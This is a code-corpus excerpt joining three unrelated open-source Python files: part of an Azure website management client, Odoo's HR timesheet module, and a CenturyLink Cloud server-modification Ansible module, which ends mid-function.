metrics: Optional. List of metrics name. Otherwise, all metrics returned.
start_time: Optional. An ISO8601 date. Otherwise, current hour is used.
end_time: Optional. An ISO8601 date. Otherwise, current time is used.
time_grain: Optional. A rollup name, as P1D. OTherwise, default rollup for the metrics is used.
More information and metrics name at:
http://msdn.microsoft.com/en-us/library/azure/dn166964.aspx
'''
metrics = ('names='+','.join(metrics)) if metrics else ''
start_time = ('StartTime='+start_time) if start_time else ''
end_time = ('EndTime='+end_time) if end_time else ''
time_grain = ('TimeGrain='+time_grain) if time_grain else ''
parameters = ('&'.join(v for v in (metrics, start_time, end_time, time_grain) if v))
parameters = '?'+parameters if parameters else ''
return self._perform_get(self._get_historical_usage_metrics_path(webspace_name, website_name) + parameters,
MetricResponses)
def get_metric_definitions(self, webspace_name, website_name):
'''
Get metric definitions of metrics available of this web site.
webspace_name: The name of the webspace.
website_name: The name of the website.
'''
return self._perform_get(self._get_metric_definitions_path(webspace_name, website_name),
MetricDefinitions)
def get_publish_profile_xml(self, webspace_name, website_name):
'''
Get a site's publish profile as a string
webspace_name: The name of the webspace.
website_name: The name of the website.
'''
return self._perform_get(self._get_publishxml_path(webspace_name, website_name),
None).body.decode("utf-8")
def get_publish_profile(self, webspace_name, website_name):
'''
Get a site's publish profile as an object
webspace_name: The name of the webspace.
website_name: The name of the website.
'''
return self._perform_get(self._get_publishxml_path(webspace_name, website_name),
PublishData)
#--Helper functions --------------------------------------------------
def _get_list_webspaces_path(self):
return self._get_path('services/webspaces', None)
def _get_webspace_details_path(self, webspace_name):
return self._get_path('services/webspaces/', webspace_name)
def _get_sites_path(self, webspace_name):
return self._get_path('services/webspaces/',
webspace_name) + '/sites'
def _get_sites_details_path(self, webspace_name, website_name):
return self._get_path('services/webspaces/',
webspace_name) + '/sites/' + _str(website_name)
def _get_restart_path(self, webspace_name, website_name):
return self._get_path('services/webspaces/',
webspace_name) + '/sites/' + _str(website_name) + '/restart/'
def _get_historical_usage_metrics_path(self, webspace_name, website_name):
return self._get_path('services/webspaces/',
webspace_name) + '/sites/' + _str(website_name) + '/metrics/'
def _get_metric_definitions_path(self, webspace_name, website_name):
return self._get_path('services/webspaces/',
webspace_name) + '/sites/' + _str(website_name) + '/metricdefinitions/'
def _get_publishxml_path(self, webspace_name, website_name):
return self._get_path('services/webspaces/',
webspace_name) + '/sites/' + _str(website_name) + '/publishxml/'
| apache-2.0 |
codekaki/odoo | addons/hr_timesheet/hr_timesheet.py | 39 | 9938 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import time
from openerp.osv import fields
from openerp.osv import osv
from openerp.tools.translate import _
class hr_employee(osv.osv):
_name = "hr.employee"
_inherit = "hr.employee"
_columns = {
'product_id': fields.many2one('product.product', 'Product', help="Specifies employee's designation as a product with type 'service'."),
'journal_id': fields.many2one('account.analytic.journal', 'Analytic Journal'),
'uom_id': fields.related('product_id', 'uom_id', type='many2one', relation='product.uom', string='Unit of Measure', store=True, readonly=True)
}
def _getAnalyticJournal(self, cr, uid, context=None):
md = self.pool.get('ir.model.data')
try:
dummy, res_id = md.get_object_reference(cr, uid, 'hr_timesheet', 'analytic_journal')
#search on id found in result to check if current user has read access right
check_right = self.pool.get('account.analytic.journal').search(cr, uid, [('id', '=', res_id)], context=context)
if check_right:
return res_id
except ValueError:
pass
return False
def _getEmployeeProduct(self, cr, uid, context=None):
md = self.pool.get('ir.model.data')
try:
dummy, res_id = md.get_object_reference(cr, uid, 'product', 'product_product_consultant')
#search on id found in result to check if current user has read access right
check_right = self.pool.get('product.template').search(cr, uid, [('id', '=', res_id)], context=context)
if check_right:
return res_id
except ValueError:
pass
return False
_defaults = {
'journal_id': _getAnalyticJournal,
'product_id': _getEmployeeProduct
}
hr_employee()
class hr_analytic_timesheet(osv.osv):
_name = "hr.analytic.timesheet"
_table = 'hr_analytic_timesheet'
_description = "Timesheet Line"
_inherits = {'account.analytic.line': 'line_id'}
_order = "id desc"
_columns = {
'line_id': fields.many2one('account.analytic.line', 'Analytic Line', ondelete='cascade', required=True),
'partner_id': fields.related('account_id', 'partner_id', type='many2one', string='Partner', relation='res.partner', store=True),
}
def unlink(self, cr, uid, ids, context=None):
toremove = {}
for obj in self.browse(cr, uid, ids, context=context):
toremove[obj.line_id.id] = True
self.pool.get('account.analytic.line').unlink(cr, uid, toremove.keys(), context=context)
return super(hr_analytic_timesheet, self).unlink(cr, uid, ids, context=context)
def on_change_unit_amount(self, cr, uid, id, prod_id, unit_amount, company_id, unit=False, journal_id=False, context=None):
res = {'value':{}}
if prod_id and unit_amount:
# find company
company_id = self.pool.get('res.company')._company_default_get(cr, uid, 'account.analytic.line', context=context)
r = self.pool.get('account.analytic.line').on_change_unit_amount(cr, uid, id, prod_id, unit_amount, company_id, unit, journal_id, context=context)
if r:
res.update(r)
# update unit of measurement
if prod_id:
uom = self.pool.get('product.product').browse(cr, uid, prod_id, context=context)
if uom.uom_id:
res['value'].update({'product_uom_id': uom.uom_id.id})
else:
res['value'].update({'product_uom_id': False})
return res
def _getEmployeeProduct(self, cr, uid, context=None):
if context is None:
context = {}
emp_obj = self.pool.get('hr.employee')
emp_id = emp_obj.search(cr, uid, [('user_id', '=', context.get('user_id') or uid)], context=context)
if emp_id:
emp = emp_obj.browse(cr, uid, emp_id[0], context=context)
if emp.product_id:
return emp.product_id.id
return False
def _getEmployeeUnit(self, cr, uid, context=None):
emp_obj = self.pool.get('hr.employee')
if context is None:
context = {}
emp_id = emp_obj.search(cr, uid, [('user_id', '=', context.get('user_id') or uid)], context=context)
if emp_id:
emp = emp_obj.browse(cr, uid, emp_id[0], context=context)
if emp.product_id:
return emp.product_id.uom_id.id
return False
def _getGeneralAccount(self, cr, uid, context=None):
emp_obj = self.pool.get('hr.employee')
if context is None:
context = {}
emp_id = emp_obj.search(cr, uid, [('user_id', '=', context.get('user_id') or uid)], context=context)
if emp_id:
emp = emp_obj.browse(cr, uid, emp_id[0], context=context)
if bool(emp.product_id):
a = emp.product_id.property_account_expense.id
if not a:
a = emp.product_id.categ_id.property_account_expense_categ.id
if a:
return a
return False
def _getAnalyticJournal(self, cr, uid, context=None):
emp_obj = self.pool.get('hr.employee')
if context is None:
context = {}
if context.get('employee_id'):
emp_id = [context.get('employee_id')]
else:
emp_id = emp_obj.search(cr, uid, [('user_id','=',context.get('user_id') or uid)], limit=1, context=context)
if not emp_id:
raise osv.except_osv(_('Warning!'), _('Please create an employee for this user, using the menu: Human Resources > Employees.'))
emp = emp_obj.browse(cr, uid, emp_id[0], context=context)
if emp.journal_id:
return emp.journal_id.id
else :
raise osv.except_osv(_('Warning!'), _('No analytic journal defined for \'%s\'.\nYou should assign an analytic journal on the employee form.')%(emp.name))
_defaults = {
'product_uom_id': _getEmployeeUnit,
'product_id': _getEmployeeProduct,
'general_account_id': _getGeneralAccount,
'journal_id': _getAnalyticJournal,
'date': lambda self, cr, uid, ctx: ctx.get('date', fields.date.context_today(self,cr,uid,context=ctx)),
'user_id': lambda obj, cr, uid, ctx: ctx.get('user_id') or uid,
}
def on_change_account_id(self, cr, uid, ids, account_id, context=None):
return {'value':{}}
def on_change_date(self, cr, uid, ids, date):
if ids:
new_date = self.read(cr, uid, ids[0], ['date'])['date']
if date != new_date:
warning = {'title':'User Alert!','message':'Changing the date will let this entry appear in the timesheet of the new date.'}
return {'value':{},'warning':warning}
return {'value':{}}
def create(self, cr, uid, vals, context=None):
if context is None:
context = {}
emp_obj = self.pool.get('hr.employee')
emp_id = emp_obj.search(cr, uid, [('user_id', '=', context.get('user_id') or uid)], context=context)
ename = ''
if emp_id:
ename = emp_obj.browse(cr, uid, emp_id[0], context=context).name
if not vals.get('journal_id',False):
raise osv.except_osv(_('Warning!'), _('No \'Analytic Journal\' is defined for employee %s \nDefine an employee for the selected user and assign an \'Analytic Journal\'!')%(ename,))
if not vals.get('account_id',False):
raise osv.except_osv(_('Warning!'), _('No analytic account is defined on the project.\nPlease set one or we cannot automatically fill the timesheet.'))
return super(hr_analytic_timesheet, self).create(cr, uid, vals, context=context)
def on_change_user_id(self, cr, uid, ids, user_id):
if not user_id:
return {}
context = {'user_id': user_id}
return {'value': {
'product_id': self. _getEmployeeProduct(cr, uid, context),
'product_uom_id': self._getEmployeeUnit(cr, uid, context),
'general_account_id': self._getGeneralAccount(cr, uid, context),
'journal_id': self._getAnalyticJournal(cr, uid, context),
}}
class account_analytic_account(osv.osv):
_inherit = 'account.analytic.account'
_description = 'Analytic Account'
_columns = {
'use_timesheets': fields.boolean('Timesheets', help="Check this field if this project manages timesheets"),
}
def on_change_template(self, cr, uid, ids, template_id, context=None):
res = super(account_analytic_account, self).on_change_template(cr, uid, ids, template_id, context=context)
if template_id and 'value' in res:
template = self.browse(cr, uid, template_id, context=context)
res['value']['use_timesheets'] = template.use_timesheets
return res
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
matbu/ansible-modules-extras | cloud/centurylink/clc_modify_server.py | 48 | 35314 | #!/usr/bin/python
#
# Copyright (c) 2015 CenturyLink
#
# This file is part of Ansible.
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>
#
ANSIBLE_METADATA = {'status': ['preview'],
'supported_by': 'community',
'version': '1.0'}
DOCUMENTATION = '''
module: clc_modify_server
short_description: modify servers in CenturyLink Cloud.
description:
- An Ansible module to modify servers in CenturyLink Cloud.
version_added: "2.0"
options:
server_ids:
description:
- A list of server Ids to modify.
required: True
cpu:
description:
- How many CPUs to update on the server
required: False
default: None
memory:
description:
- Memory (in GB) to set to the server.
required: False
default: None
anti_affinity_policy_id:
description:
- The anti affinity policy id to be set for a hyper scale server.
This is mutually exclusive with 'anti_affinity_policy_name'
required: False
default: None
anti_affinity_policy_name:
description:
- The anti affinity policy name to be set for a hyper scale server.
This is mutually exclusive with 'anti_affinity_policy_id'
required: False
default: None
alert_policy_id:
description:
- The alert policy id to be associated to the server.
This is mutually exclusive with 'alert_policy_name'
required: False
default: None
alert_policy_name:
description:
- The alert policy name to be associated to the server.
This is mutually exclusive with 'alert_policy_id'
required: False
default: None
state:
description:
- The state to insure that the provided resources are in.
default: 'present'
required: False
choices: ['present', 'absent']
wait:
description:
- Whether to wait for the provisioning tasks to finish before returning.
default: True
required: False
choices: [ True, False]
requirements:
- python = 2.7
- requests >= 2.5.0
- clc-sdk
author: "CLC Runner (@clc-runner)"
notes:
- To use this module, it is required to set the below environment variables which enables access to the
Centurylink Cloud
- CLC_V2_API_USERNAME, the account login id for the centurylink cloud
- CLC_V2_API_PASSWORD, the account password for the centurylink cloud
- Alternatively, the module accepts the API token and account alias. The API token can be generated using the
CLC account login and password via the HTTP api call @ https://api.ctl.io/v2/authentication/login
- CLC_V2_API_TOKEN, the API token generated from https://api.ctl.io/v2/authentication/login
- CLC_ACCT_ALIAS, the account alias associated with the centurylink cloud
- Users can set CLC_V2_API_URL to specify an endpoint for pointing to a different CLC environment.
'''
EXAMPLES = '''
# Note - You must set the CLC_V2_API_USERNAME And CLC_V2_API_PASSWD Environment variables before running these examples
- name: set the cpu count to 4 on a server
clc_modify_server:
server_ids:
- UC1TESTSVR01
- UC1TESTSVR02
cpu: 4
state: present
- name: set the memory to 8GB on a server
clc_modify_server:
server_ids:
- UC1TESTSVR01
- UC1TESTSVR02
memory: 8
state: present
- name: set the anti affinity policy on a server
clc_modify_server:
server_ids:
- UC1TESTSVR01
- UC1TESTSVR02
anti_affinity_policy_name: 'aa_policy'
state: present
- name: remove the anti affinity policy on a server
clc_modify_server:
server_ids:
- UC1TESTSVR01
- UC1TESTSVR02
anti_affinity_policy_name: 'aa_policy'
state: absent
- name: add the alert policy on a server
clc_modify_server:
server_ids:
- UC1TESTSVR01
- UC1TESTSVR02
alert_policy_name: 'alert_policy'
state: present
- name: remove the alert policy on a server
clc_modify_server:
server_ids:
- UC1TESTSVR01
- UC1TESTSVR02
alert_policy_name: 'alert_policy'
state: absent
- name: set the memory to 16GB and cpu to 8 core on a lust if servers
clc_modify_server:
server_ids:
- UC1TESTSVR01
- UC1TESTSVR02
cpu: 8
memory: 16
state: present
'''
RETURN = '''
server_ids:
description: The list of server ids that are changed
returned: success
type: list
sample:
[
"UC1TEST-SVR01",
"UC1TEST-SVR02"
]
servers:
description: The list of server objects that are changed
returned: success
type: list
sample:
[
{
"changeInfo":{
"createdBy":"service.wfad",
"createdDate":1438196820,
"modifiedBy":"service.wfad",
"modifiedDate":1438196820
},
"description":"test-server",
"details":{
"alertPolicies":[
],
"cpu":1,
"customFields":[
],
"diskCount":3,
"disks":[
{
"id":"0:0",
"partitionPaths":[
],
"sizeGB":1
},
{
"id":"0:1",
"partitionPaths":[
],
"sizeGB":2
},
{
"id":"0:2",
"partitionPaths":[
],
"sizeGB":14
}
],
"hostName":"",
"inMaintenanceMode":false,
"ipAddresses":[
{
"internal":"10.1.1.1"
}
],
"memoryGB":1,
"memoryMB":1024,
"partitions":[
],
"powerState":"started",
"snapshots":[
],
"storageGB":17
},
"groupId":"086ac1dfe0b6411989e8d1b77c4065f0",
"id":"test-server",
"ipaddress":"10.120.45.23",
"isTemplate":false,
"links":[
{
"href":"/v2/servers/wfad/test-server",
"id":"test-server",
"rel":"self",
"verbs":[
"GET",
"PATCH",
"DELETE"
]
},
{
"href":"/v2/groups/wfad/086ac1dfe0b6411989e8d1b77c4065f0",
"id":"086ac1dfe0b6411989e8d1b77c4065f0",
"rel":"group"
},
{
"href":"/v2/accounts/wfad",
"id":"wfad",
"rel":"account"
},
{
"href":"/v2/billing/wfad/serverPricing/test-server",
"rel":"billing"
},
{
"href":"/v2/servers/wfad/test-server/publicIPAddresses",
"rel":"publicIPAddresses",
"verbs":[
"POST"
]
},
{
"href":"/v2/servers/wfad/test-server/credentials",
"rel":"credentials"
},
{
"href":"/v2/servers/wfad/test-server/statistics",
"rel":"statistics"
},
{
"href":"/v2/servers/wfad/510ec21ae82d4dc89d28479753bf736a/upcomingScheduledActivities",
"rel":"upcomingScheduledActivities"
},
{
"href":"/v2/servers/wfad/510ec21ae82d4dc89d28479753bf736a/scheduledActivities",
"rel":"scheduledActivities",
"verbs":[
"GET",
"POST"
]
},
{
"href":"/v2/servers/wfad/test-server/capabilities",
"rel":"capabilities"
},
{
"href":"/v2/servers/wfad/test-server/alertPolicies",
"rel":"alertPolicyMappings",
"verbs":[
"POST"
]
},
{
"href":"/v2/servers/wfad/test-server/antiAffinityPolicy",
"rel":"antiAffinityPolicyMapping",
"verbs":[
"PUT",
"DELETE"
]
},
{
"href":"/v2/servers/wfad/test-server/cpuAutoscalePolicy",
"rel":"cpuAutoscalePolicyMapping",
"verbs":[
"PUT",
"DELETE"
]
}
],
"locationId":"UC1",
"name":"test-server",
"os":"ubuntu14_64Bit",
"osType":"Ubuntu 14 64-bit",
"status":"active",
"storageType":"standard",
"type":"standard"
}
]
'''
__version__ = '${version}'
from distutils.version import LooseVersion
try:
import requests
except ImportError:
REQUESTS_FOUND = False
else:
REQUESTS_FOUND = True
#
# Requires the clc-python-sdk.
# sudo pip install clc-sdk
#
try:
import clc as clc_sdk
from clc import CLCException
from clc import APIFailedResponse
except ImportError:
CLC_FOUND = False
clc_sdk = None
else:
CLC_FOUND = True
class ClcModifyServer:
clc = clc_sdk
def __init__(self, module):
"""
Construct module
"""
self.clc = clc_sdk
self.module = module
if not CLC_FOUND:
self.module.fail_json(
msg='clc-python-sdk required for this module')
if not REQUESTS_FOUND:
self.module.fail_json(
msg='requests library is required for this module')
if requests.__version__ and LooseVersion(
requests.__version__) < LooseVersion('2.5.0'):
self.module.fail_json(
msg='requests library version should be >= 2.5.0')
self._set_user_agent(self.clc)
def process_request(self):
"""
Process the request - Main Code Path
:return: Returns with either an exit_json or fail_json
"""
self._set_clc_credentials_from_env()
p = self.module.params
cpu = p.get('cpu')
memory = p.get('memory')
state = p.get('state')
if state == 'absent' and (cpu or memory):
return self.module.fail_json(
msg='\'absent\' state is not supported for \'cpu\' and \'memory\' arguments')
server_ids = p['server_ids']
if not isinstance(server_ids, list):
return self.module.fail_json(
msg='server_ids needs to be a list of instances to modify: %s' %
server_ids)
(changed, server_dict_array, changed_server_ids) = self._modify_servers(
server_ids=server_ids)
self.module.exit_json(
changed=changed,
server_ids=changed_server_ids,
servers=server_dict_array)
@staticmethod
def _define_module_argument_spec():
"""
Define the argument spec for the ansible module
:return: argument spec dictionary
"""
argument_spec = dict(
server_ids=dict(type='list', required=True),
state=dict(default='present', choices=['present', 'absent']),
cpu=dict(),
memory=dict(),
anti_affinity_policy_id=dict(),
anti_affinity_policy_name=dict(),
alert_policy_id=dict(),
alert_policy_name=dict(),
wait=dict(type='bool', default=True)
)
mutually_exclusive = [
['anti_affinity_policy_id', 'anti_affinity_policy_name'],
['alert_policy_id', 'alert_policy_name']
]
return {"argument_spec": argument_spec,
"mutually_exclusive": mutually_exclusive}
def _set_clc_credentials_from_env(self):
"""
Set the CLC Credentials on the sdk by reading environment variables
:return: none
"""
env = os.environ
v2_api_token = env.get('CLC_V2_API_TOKEN', False)
v2_api_username = env.get('CLC_V2_API_USERNAME', False)
v2_api_passwd = env.get('CLC_V2_API_PASSWD', False)
clc_alias = env.get('CLC_ACCT_ALIAS', False)
api_url = env.get('CLC_V2_API_URL', False)
if api_url:
self.clc.defaults.ENDPOINT_URL_V2 = api_url
if v2_api_token and clc_alias:
self.clc._LOGIN_TOKEN_V2 = v2_api_token
self.clc._V2_ENABLED = True
self.clc.ALIAS = clc_alias
elif v2_api_username and v2_api_passwd:
self.clc.v2.SetCredentials(
api_username=v2_api_username,
api_passwd=v2_api_passwd)
else:
return self.module.fail_json(
msg="You must set the CLC_V2_API_USERNAME and CLC_V2_API_PASSWD "
"environment variables")
def _get_servers_from_clc(self, server_list, message):
"""
Internal function to fetch list of CLC server objects from a list of server ids
:param server_list: The list of server ids
:param message: the error message to throw in case of any error
:return the list of CLC server objects
"""
try:
return self.clc.v2.Servers(server_list).servers
except CLCException as ex:
return self.module.fail_json(msg=message + ': %s' % ex.message)
def _modify_servers(self, server_ids):
"""
modify the servers configuration on the provided list
:param server_ids: list of servers to modify
:return: a list of dictionaries with server information about the servers that were modified
"""
p = self.module.params
state = p.get('state')
server_params = {
'cpu': p.get('cpu'),
'memory': p.get('memory'),
'anti_affinity_policy_id': p.get('anti_affinity_policy_id'),
'anti_affinity_policy_name': p.get('anti_affinity_policy_name'),
'alert_policy_id': p.get('alert_policy_id'),
'alert_policy_name': p.get('alert_policy_name'),
}
changed = False
server_changed = False
aa_changed = False
ap_changed = False
server_dict_array = []
result_server_ids = []
request_list = []
changed_servers = []
if not isinstance(server_ids, list) or len(server_ids) < 1:
return self.module.fail_json(
msg='server_ids should be a list of servers, aborting')
servers = self._get_servers_from_clc(
server_ids,
'Failed to obtain server list from the CLC API')
for server in servers:
if state == 'present':
server_changed, server_result = self._ensure_server_config(
server, server_params)
if server_result:
request_list.append(server_result)
aa_changed = self._ensure_aa_policy_present(
server,
server_params)
ap_changed = self._ensure_alert_policy_present(
server,
server_params)
elif state == 'absent':
aa_changed = self._ensure_aa_policy_absent(
server,
server_params)
ap_changed = self._ensure_alert_policy_absent(
server,
server_params)
if server_changed or aa_changed or ap_changed:
changed_servers.append(server)
changed = True
self._wait_for_requests(self.module, request_list)
self._refresh_servers(self.module, changed_servers)
for server in changed_servers:
server_dict_array.append(server.data)
result_server_ids.append(server.id)
return changed, server_dict_array, result_server_ids
def _ensure_server_config(
self, server, server_params):
"""
ensures the server is updated with the provided cpu and memory
:param server: the CLC server object
:param server_params: the dictionary of server parameters
:return: (changed, group) -
changed: Boolean whether a change was made
result: The result from the CLC API call
"""
cpu = server_params.get('cpu')
memory = server_params.get('memory')
changed = False
result = None
if not cpu:
cpu = server.cpu
if not memory:
memory = server.memory
if memory != server.memory or cpu != server.cpu:
if not self.module.check_mode:
result = self._modify_clc_server(
self.clc,
self.module,
server.id,
cpu,
memory)
changed = True
return changed, result
@staticmethod
def _modify_clc_server(clc, module, server_id, cpu, memory):
"""
Modify the memory or CPU of a clc server.
:param clc: the clc-sdk instance to use
:param module: the AnsibleModule object
:param server_id: id of the server to modify
:param cpu: the new cpu value
:param memory: the new memory value
:return: the result of CLC API call
"""
result = None
acct_alias = clc.v2.Account.GetAlias()
try:
# Update the server configuration
job_obj = clc.v2.API.Call('PATCH',
'servers/%s/%s' % (acct_alias,
server_id),
json.dumps([{"op": "set",
"member": "memory",
"value": memory},
{"op": "set",
"member": "cpu",
"value": cpu}]))
result = clc.v2.Requests(job_obj)
except APIFailedResponse as ex:
module.fail_json(
msg='Unable to update the server configuration for server : "{0}". {1}'.format(
server_id, str(ex.response_text)))
return result
@staticmethod
def _wait_for_requests(module, request_list):
"""
Block until server provisioning requests are completed.
:param module: the AnsibleModule object
:param request_list: a list of clc-sdk.Request instances
:return: none
"""
wait = module.params.get('wait')
if wait:
# Requests.WaitUntilComplete() returns the count of failed requests
failed_requests_count = sum(
[request.WaitUntilComplete() for request in request_list])
if failed_requests_count > 0:
module.fail_json(
msg='Unable to process modify server request')
@staticmethod
def _refresh_servers(module, servers):
"""
Loop through a list of servers and refresh them.
:param module: the AnsibleModule object
:param servers: list of clc-sdk.Server instances to refresh
:return: none
"""
for server in servers:
try:
server.Refresh()
except CLCException as ex:
module.fail_json(msg='Unable to refresh the server {0}. {1}'.format(
server.id, ex.message
))
def _ensure_aa_policy_present(
self, server, server_params):
"""
ensures the server is updated with the provided anti affinity policy
:param server: the CLC server object
:param server_params: the dictionary of server parameters
:return: (changed, group) -
changed: Boolean whether a change was made
result: The result from the CLC API call
"""
changed = False
acct_alias = self.clc.v2.Account.GetAlias()
aa_policy_id = server_params.get('anti_affinity_policy_id')
aa_policy_name = server_params.get('anti_affinity_policy_name')
if not aa_policy_id and aa_policy_name:
aa_policy_id = self._get_aa_policy_id_by_name(
self.clc,
self.module,
acct_alias,
aa_policy_name)
current_aa_policy_id = self._get_aa_policy_id_of_server(
self.clc,
self.module,
acct_alias,
server.id)
if aa_policy_id and aa_policy_id != current_aa_policy_id:
self._modify_aa_policy(
self.clc,
self.module,
acct_alias,
server.id,
aa_policy_id)
changed = True
return changed
def _ensure_aa_policy_absent(
self, server, server_params):
"""
ensures the the provided anti affinity policy is removed from the server
:param server: the CLC server object
:param server_params: the dictionary of server parameters
:return: (changed, group) -
changed: Boolean whether a change was made
result: The result from the CLC API call
"""
changed = False
acct_alias = self.clc.v2.Account.GetAlias()
aa_policy_id = server_params.get('anti_affinity_policy_id')
aa_policy_name = server_params.get('anti_affinity_policy_name')
if not aa_policy_id and aa_policy_name:
aa_policy_id = self._get_aa_policy_id_by_name(
self.clc,
self.module,
acct_alias,
aa_policy_name)
current_aa_policy_id = self._get_aa_policy_id_of_server(
self.clc,
self.module,
acct_alias,
server.id)
if aa_policy_id and aa_policy_id == current_aa_policy_id:
self._delete_aa_policy(
self.clc,
self.module,
acct_alias,
server.id)
changed = True
return changed
@staticmethod
def _modify_aa_policy(clc, module, acct_alias, server_id, aa_policy_id):
"""
modifies the anti affinity policy of the CLC server
:param clc: the clc-sdk instance to use
:param module: the AnsibleModule object
:param acct_alias: the CLC account alias
:param server_id: the CLC server id
:param aa_policy_id: the anti affinity policy id
:return: result: The result from the CLC API call
"""
result = None
if not module.check_mode:
try:
result = clc.v2.API.Call('PUT',
'servers/%s/%s/antiAffinityPolicy' % (
acct_alias,
server_id),
json.dumps({"id": aa_policy_id}))
except APIFailedResponse as ex:
module.fail_json(
msg='Unable to modify anti affinity policy to server : "{0}". {1}'.format(
server_id, str(ex.response_text)))
return result
@staticmethod
def _delete_aa_policy(clc, module, acct_alias, server_id):
"""
Delete the anti affinity policy of the CLC server
:param clc: the clc-sdk instance to use
:param module: the AnsibleModule object
:param acct_alias: the CLC account alias
:param server_id: the CLC server id
:return: result: The result from the CLC API call
"""
result = None
if not module.check_mode:
try:
result = clc.v2.API.Call('DELETE',
'servers/%s/%s/antiAffinityPolicy' % (
acct_alias,
server_id),
json.dumps({}))
except APIFailedResponse as ex:
module.fail_json(
msg='Unable to delete anti affinity policy to server : "{0}". {1}'.format(
server_id, str(ex.response_text)))
return result
@staticmethod
def _get_aa_policy_id_by_name(clc, module, alias, aa_policy_name):
"""
retrieves the anti affinity policy id of the server based on the name of the policy
:param clc: the clc-sdk instance to use
:param module: the AnsibleModule object
:param alias: the CLC account alias
:param aa_policy_name: the anti affinity policy name
:return: aa_policy_id: The anti affinity policy id
"""
aa_policy_id = None
try:
aa_policies = clc.v2.API.Call(method='GET',
url='antiAffinityPolicies/%s' % alias)
except APIFailedResponse as ex:
return module.fail_json(
msg='Unable to fetch anti affinity policies from account alias : "{0}". {1}'.format(
alias, str(ex.response_text)))
for aa_policy in aa_policies.get('items'):
if aa_policy.get('name') == aa_policy_name:
if not aa_policy_id:
aa_policy_id = aa_policy.get('id')
else:
return module.fail_json(
msg='multiple anti affinity policies were found with policy name : %s' % aa_policy_name)
if not aa_policy_id:
module.fail_json(
msg='No anti affinity policy was found with policy name : %s' % aa_policy_name)
return aa_policy_id
@staticmethod
def _get_aa_policy_id_of_server(clc, module, alias, server_id):
"""
retrieves the anti affinity policy id of the server based on the CLC server id
:param clc: the clc-sdk instance to use
:param module: the AnsibleModule object
:param alias: the CLC account alias
:param server_id: the CLC server id
:return: aa_policy_id: The anti affinity policy id
"""
aa_policy_id = None
try:
result = clc.v2.API.Call(
method='GET', url='servers/%s/%s/antiAffinityPolicy' %
(alias, server_id))
aa_policy_id = result.get('id')
except APIFailedResponse as ex:
if ex.response_status_code != 404:
module.fail_json(msg='Unable to fetch anti affinity policy for server "{0}". {1}'.format(
server_id, str(ex.response_text)))
return aa_policy_id
def _ensure_alert_policy_present(
self, server, server_params):
"""
ensures the server is updated with the provided alert policy
:param server: the CLC server object
:param server_params: the dictionary of server parameters
:return: (changed, group) -
changed: Boolean whether a change was made
result: The result from the CLC API call
"""
changed = False
acct_alias = self.clc.v2.Account.GetAlias()
alert_policy_id = server_params.get('alert_policy_id')
alert_policy_name = server_params.get('alert_policy_name')
if not alert_policy_id and alert_policy_name:
alert_policy_id = self._get_alert_policy_id_by_name(
self.clc,
self.module,
acct_alias,
alert_policy_name)
if alert_policy_id and not self._alert_policy_exists(
server, alert_policy_id):
self._add_alert_policy_to_server(
self.clc,
self.module,
acct_alias,
server.id,
alert_policy_id)
changed = True
return changed
def _ensure_alert_policy_absent(
self, server, server_params):
"""
ensures the alert policy is removed from the server
:param server: the CLC server object
:param server_params: the dictionary of server parameters
:return: (changed, group) -
changed: Boolean whether a change was made
result: The result from the CLC API call
"""
changed = False
acct_alias = self.clc.v2.Account.GetAlias()
alert_policy_id = server_params.get('alert_policy_id')
alert_policy_name = server_params.get('alert_policy_name')
if not alert_policy_id and alert_policy_name:
alert_policy_id = self._get_alert_policy_id_by_name(
self.clc,
self.module,
acct_alias,
alert_policy_name)
if alert_policy_id and self._alert_policy_exists(
server, alert_policy_id):
self._remove_alert_policy_to_server(
self.clc,
self.module,
acct_alias,
server.id,
alert_policy_id)
changed = True
return changed
@staticmethod
def _add_alert_policy_to_server(
clc, module, acct_alias, server_id, alert_policy_id):
"""
add the alert policy to CLC server
:param clc: the clc-sdk instance to use
:param module: the AnsibleModule object
:param acct_alias: the CLC account alias
:param server_id: the CLC server id
:param alert_policy_id: the alert policy id
:return: result: The result from the CLC API call
"""
result = None
if not module.check_mode:
try:
result = clc.v2.API.Call('POST',
'servers/%s/%s/alertPolicies' % (
acct_alias,
server_id),
json.dumps({"id": alert_policy_id}))
except APIFailedResponse as ex:
module.fail_json(msg='Unable to set alert policy to the server : "{0}". {1}'.format(
server_id, str(ex.response_text)))
return result
@staticmethod
def _remove_alert_policy_to_server(
clc, module, acct_alias, server_id, alert_policy_id):
"""
remove the alert policy to the CLC server
:param clc: the clc-sdk instance to use
:param module: the AnsibleModule object
:param acct_alias: the CLC account alias
:param server_id: the CLC server id
:param alert_policy_id: the alert policy id
:return: result: The result from the CLC API call
"""
result = None
if not module.check_mode:
try:
result = clc.v2.API.Call('DELETE',
'servers/%s/%s/alertPolicies/%s'
% (acct_alias, server_id, alert_policy_id))
except APIFailedResponse as ex:
module.fail_json(msg='Unable to remove alert policy from the server : "{0}". {1}'.format(
server_id, str(ex.response_text)))
return result
@staticmethod
def _get_alert_policy_id_by_name(clc, module, alias, alert_policy_name):
"""
retrieves the alert policy id of the server based on the name of the policy
:param clc: the clc-sdk instance to use
:param module: the AnsibleModule object
:param alias: the CLC account alias
:param alert_policy_name: the alert policy name
:return: alert_policy_id: The alert policy id
"""
alert_policy_id = None
try:
alert_policies = clc.v2.API.Call(method='GET',
url='alertPolicies/%s' % alias)
except APIFailedResponse as ex:
return module.fail_json(msg='Unable to fetch alert policies for account : "{0}". {1}'.format(
alias, str(ex.response_text)))
